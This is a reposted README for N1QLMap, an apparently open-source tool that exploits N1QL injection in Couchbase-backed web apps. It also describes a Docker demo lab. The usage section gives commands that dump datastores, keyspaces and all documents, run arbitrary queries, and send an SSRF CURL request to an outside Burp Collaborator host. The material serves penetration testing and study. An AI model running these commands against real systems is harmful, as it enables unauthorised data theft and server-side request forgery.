N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities

N1QLMap is an N1QL exploitation tool. Currently works with Couchbase database. The tool supports data extraction and performing SSRF attacks via CURL. More information can be found here: https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database.


usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v]                  (-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]])                  hostpositional arguments:  host                  Host used to send an HTTP request e.g. https://vulndomain.netoptional arguments:  -h, --help            show this help message and exit  -r REQUEST, --request REQUEST                        Path to an HTTP request  -k KEYWORD, --keyword KEYWORD                        Keyword that exists in HTTP response when query is successful  --proxy PROXY         Proxy server address  --validatecerts       Set the flag to enforce certificate validation. Certificates are not validated by default!  -v, --verbose_debug   Set the verbosity level to debug  -d, --   datastores      Lists available datastores  -ks DATASTORE_URL, --keyspaces DATASTORE_URL                        Lists available keyspaces for specific datastore URL  -e KEYSPACE_ID, --extract KEYSPACE_ID                        Extracts data from a specific keyspace  -q QUERY, --query QUERY                        Run arbitrary N1QL query  -c [ENDPOINT [OPTIONS ...]], --curl [ENDPOINT [OPTIONS ...]]                        Runs CURL N1QL function inside the query, can be used to SSRF

  1. Put an HTTP request to request.txt file. Mark an injection point using *i*. See example_request_1.txt file for a reference.
  2. Use one the following commands.

Extracts datastores:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores

Extracts keyspaces from the specific datastore ID:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces ""

Extracts all documents from the given keyspace:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample

Run arbitrary query:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'

Perform CURL request / SSRF:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl *************j3mrt7xy3pre.burpcollaborator.net "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"


To play with the vulnerability you can spin Docker machines with Couchbase and NodeJS web application. If you already met the Requirements, just run the:

cd n1ql-demo./quick_setup.sh

Now, you can run command described in Usage section against Dockerised web application.


N1QLMap.py script doesn't need any specific requirements apart of Python 3.

The following requirements are only for Demo provided in n1ql-demo directory.

  • Docker
  • Docker Compose

To install Docker and Docker Compose on Kali:

# Docker Installationcurl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.listapt-get updateapt-get remove docker docker-engine docker.ioapt-get install docker-ce# Start Docker Servicesystemctl start docker# Docker Compose Installationsudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-composesudo chmod +x /usr/local/bin/docker-compose

Let's test Docker:

docker run hello-world

Via: feedproxy.google.com
N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities Reviewed by Anónimo on 17:38 Rating: 5